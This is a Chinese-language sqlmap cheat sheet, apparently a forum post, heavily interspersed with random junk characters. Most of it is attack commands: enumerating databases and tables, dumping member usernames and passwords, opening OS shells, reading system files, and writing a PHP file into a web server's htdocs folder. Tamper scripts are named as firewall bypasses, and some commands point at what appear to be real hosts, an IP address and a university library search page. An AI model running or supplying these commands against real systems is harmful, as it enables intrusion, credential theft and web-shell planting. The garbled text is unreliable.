/pentest/database/sqlmap9 a" q) `1 N; G8 I! d8 M
7 w% B9 x- r) v" n. Eupdate :::::> in the folder after execute following order : svn update
! y4 `) v) U6 X; j/ w
; O; p o' {! L& z; ], @sqlmap.py -r 1.txt --current-db
, G5 r+ C; w6 ?% u9 a
, z' G2 V5 R) d: D2 h3 Hv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
+ U2 ]5 m( ~7 G. x7 l1 {2 K$ l1 m/ R
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
. Z8 V3 _% E' k猜解数据库* a0 Z7 ?' V" M! Y& d
./sqlmap.py -u "injection-url" --dbs
$ K7 u% H/ l# x* _& A3 I9 [% Usqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"/ m1 u! ^4 N* `' Q
& y d0 Y( E6 W% \! _, y; D# S" P/ k
猜解表名* F. e0 n0 S% x! J
./sqlmap.py -u "injection-url" -D database_name --tables9 _/ y7 K% `) c9 O
1 t) Y! x1 r! @& rsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"0 G& R" k ?) W/ y% B' r: B5 `9 N
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
: z1 U# i" i% Z% T( K3 m7 b) I9 j- p! r0 y/ _3 q" M# M
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump" R0 ~2 V8 Y: e5 `; R- d0 d
0 ~0 }; n4 ~6 `6 M: K9 qsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py") r6 s* h) |2 z# X3 U9 b1 l
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
' \+ M- a I5 d3 O7 B- ] vsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 3 X% d7 y9 ? d2 B/ a& e# v
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"0 U w$ {# Q* q8 {
Q1 C8 ^* ]. R: P; H3 j8 J
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
3 M" Z9 C6 w. gsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"$ L& a! k( K6 ~; \* D% z
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
- t. _9 y9 B! Q9 ]" l; i3 lsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
' b a4 ~; c* I, K5 zsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump( b4 k" N5 T K: f4 ^0 k* k
, s2 @; V( z3 O5 m1 u0 Usqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
6 R% E- f! Z. ?sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py": i- U# C/ B' o$ z
% q L2 \' [9 F! G* `sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"' {( X4 a/ K: h( p5 N9 _4 J
猜解列名4 {) t4 v: D& y+ U9 f- T
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
: R* E# Q) j0 p9 ~: T+ m* A
; ], H6 j" K/ d" Psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
8 M0 @1 h. O* F3 wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
5 a6 U4 D( P* Q, Osqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"* f6 s2 p7 b5 B" s A! ~" [- v* h
% L4 g' s! o4 g
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"; C$ t- n7 Z. d+ S
&submit=Go
0 i8 n& r- a3 K, n猜解值
; f% j: c0 o* X; ?/ W./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump+ K+ t2 n" N4 o7 C4 ~8 i
========================================================" \$ y3 ?) |2 F* F% M! ?
搜索表名中包括mana字符的
8 i% d, [ h. q/sqlmap.py -u "injection-url" -T mana --search/ ]" R$ R H& W1 H' _
返回一个交互式sql shell3 I! |5 z: p) F1 F, Q6 z
/sqlmap.py -u "injection-url" --sql-shell
6 B# V0 j Y! Z) ], J读取指定文件(需权限)% k: h6 X! x5 p; c
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
7 @% }2 d* S+ h查看当前 用户 及 数据库 ) v$ m9 \5 P. s( x. Q/ _3 L
/sqlmap.py -u "injection-url" --current-user --current-db8 [6 N" s: b9 ~
本地文件 写入 远程目标绝对路径; ]1 r0 ~) l9 A7 _$ K; a
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径- U1 m6 n! p% k. Q) R8 r M
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
/ q, p: I* S& l9 r* n/ W
e ^( g% b" `9 @' J3 E1 H% msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 z+ }, y \, X查看某用的权限
' u6 V. B1 d. q( @ {/sqlmap.py -u "injection-url" --privileges -U root* ?" ~/ ^& }6 K ~4 O& N
查看当前用户是否为dba
2 \. m7 w4 ?" P4 Q) k6 m5 i# \7 q/sqlmap.py -u "injection-url" --is-dba
5 h7 \6 k! e! w3 U读取所有数据库用户或指定数据库用户的密码
" Z, l" A9 [' B( Y) |6 ^, }/ ^! Y* xsqlmap.py -r 1.txt --users --passwords
0 P1 }/ J- c7 s0 R' r Esqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" 9 ?6 j0 M$ W' h k x; m
+ ^% b) t' F7 f/sqlmap.py -u "injection-url" --passwords -U root
6 b! K- m0 Z6 C6 `
2 u- _: Q6 B6 T9 m8 m--start&&--stop 与 --first&&--last 的区别
( X5 e, k. i% A5 z1 I% K/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
7 \% Y& j3 k* c9 k# w* Q) i# Z$ q% k( ^4 @
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)% b- g+ q& P2 |/ b
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables& E6 Q# s: R: E! W
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
# u5 ?4 }% x6 e% N; Y( T! _, ~1 Q
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
2 ^+ K6 o0 v; J" j$ W; ], B/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"0 o$ Z% [6 c9 N: K" C5 n
7 H ]- ~2 y# C, ~( W/ d6 @2 [
|